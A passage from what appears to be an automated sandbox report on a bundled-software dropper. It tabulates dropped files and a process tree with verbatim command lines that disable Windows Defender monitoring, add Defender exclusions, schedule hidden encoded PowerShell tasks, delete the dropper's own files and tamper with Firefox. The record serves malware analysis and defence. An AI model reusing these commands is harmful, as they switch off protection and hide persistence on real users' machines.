| File created | C:\Program Files (x86)\Reg Organizer\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-GL0IN.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-6DSK2.tmp | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\Documentation\English\is-20DUD.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\ScanRename\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-UGFNF.tmp | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-JIS9A.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-QFE3J.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Reg Organizer\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
| File created | C:\Program Files (x86)\ScanRename\is-860AH.tmp | C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-1DM7Q.tmp | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-45AFE.tmp | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Any Drive Formatter\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-HQ93Q.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-3ASBN.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-52SMQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-3DEJA.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-FBLHA.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-UPG7J.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-NG4MM.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-HEEQK.tmp | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-194OU.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\ScanRename\is-AA2TF.tmp | C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-SUQ5L.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-1V9A0.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-FH67E.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-SJL9F.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\ScanRename\is-9EDC2.tmp | C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\ScanRename\ScanRename.exe | C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\ScanRename\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-GLMA5.tmp | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-GSAUU.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-7Q57V.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-85F56.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\XxxUzwYQU\gZNljN.dll | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-D660G.tmp | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\Documentation\Russian\is-VS512.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-51CA6.tmp | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-POECU.tmp | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\bGAvhKhnIPTNQeobsw.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\YESfVrKgbFKcjSeIN.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\iwOiVBtjWoVYUMW.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host | C:\Windows\SysWOW64\wscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\wscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\wscript.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Windows\SysWOW64\wscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings | C:\Windows\SysWOW64\wscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft | C:\Windows\SysWOW64\wscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings | C:\Windows\SysWOW64\wscript.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Windows\SysWOW64\wscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\SysWOW64\wscript.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SoundBose.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe
"C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe"
C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp
"C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp" /SL5="$70126,4965743,52224,C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe"
C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
"C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Reg Organizer 6"
C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
"C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe" ad9ff40ab2841a8973dbdb0a6dca746b
C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe
C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe
C:\Users\Admin\AppData\Local\Temp\Ft8isKJ5\zI9VJZP2WFNnHYj20.exe
C:\Users\Admin\AppData\Local\Temp\Ft8isKJ5\zI9VJZP2WFNnHYj20.exe /VERYSILENT
C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe
C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe /sid=3 /pid=449
C:\Users\Admin\AppData\Local\Temp\FaIOXtKt\EdL8iSHGnMSs6MTcpU.exe
C:\Users\Admin\AppData\Local\Temp\FaIOXtKt\EdL8iSHGnMSs6MTcpU.exe /u SUB=ad9ff40ab2841a8973dbdb0a6dca746b
C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe
C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe /S /site_id=757674
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe
C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe
C:\Users\Admin\AppData\Local\Temp\Uc0mQDyj\SCLt3f0W7iK6UwxVd.exe
C:\Users\Admin\AppData\Local\Temp\Uc0mQDyj\SCLt3f0W7iK6UwxVd.exe
C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp
"C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp" /SL5="$2023E,990754,54272,C:\Users\Admin\AppData\Local\Temp\FaIOXtKt\EdL8iSHGnMSs6MTcpU.exe" /u SUB=ad9ff40ab2841a8973dbdb0a6dca746b
C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp
"C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp" /SL5="$30242,2567431,54272,C:\Users\Admin\AppData\Local\Temp\Uc0mQDyj\SCLt3f0W7iK6UwxVd.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gSRPiGqxS" /SC once /ST 17:12:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Users\Admin\AppData\Local\Temp\SoundBose.exe
C:\Users\Admin\AppData\Local\Temp\SoundBose.exe
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Scan Rename"
C:\Program Files (x86)\ScanRename\ScanRename.exe
"C:\Program Files (x86)\ScanRename\ScanRename.exe" /u SUB=ad9ff40ab2841a8973dbdb0a6dca746b
C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe
"C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gSRPiGqxS"
C:\Windows\system32\taskeng.exe
taskeng.exe {462DC29C-DE10-415F-9641-E7C058AA9F44} S-1-5-21-3385717845-2518323428-350143044-1000:SABDUHNY\Admin:Interactive:[1]
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "ScanRename.exe" /f & erase "C:\Program Files (x86)\ScanRename\ScanRename.exe" & exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "ScanRename.exe" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gSRPiGqxS"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bGAvhKhnIPTNQeobsw" /SC once /ST 18:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\DOgvvll.exe\" bt /site_id 757674 /S" /V1 /F
C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe
C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\Ft8isKJ5\zI9VJZP2WFNnHYj20.exe & exit
C:\Windows\system32\PING.EXE
ping 0
C:\Windows\system32\taskeng.exe
taskeng.exe {AEE7CBD2-A691-464C-9512-8E447F9C410D} S-1-5-18:NT AUTHORITY\System:Service:
C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\DOgvvll.exe
C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\DOgvvll.exe bt /site_id 757674 /S
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gdoyoZnzk" /SC once /ST 12:07:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gdoyoZnzk"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gdoyoZnzk"
C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gZmPYbiLE" /SC once /ST 06:42:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gZmPYbiLE"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gZmPYbiLE"
C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\HsdHtTcNAoJBjrVs\FxXpZakA\AbtnDxAOktyFDgsF.wsf"
C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\HsdHtTcNAoJBjrVs\FxXpZakA\AbtnDxAOktyFDgsF.wsf"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NxGlAgQUfzUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NxGlAgQUfzUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OdCkbftzuRPDCLooswR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OdCkbftzuRPDCLooswR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WyuevociGfNU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WyuevociGfNU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XxxUzwYQU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XxxUzwYQU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\unWhUoTpcLxwC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\unWhUoTpcLxwC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\FZMYpcBymcbXiuVB" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\FZMYpcBymcbXiuVB" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
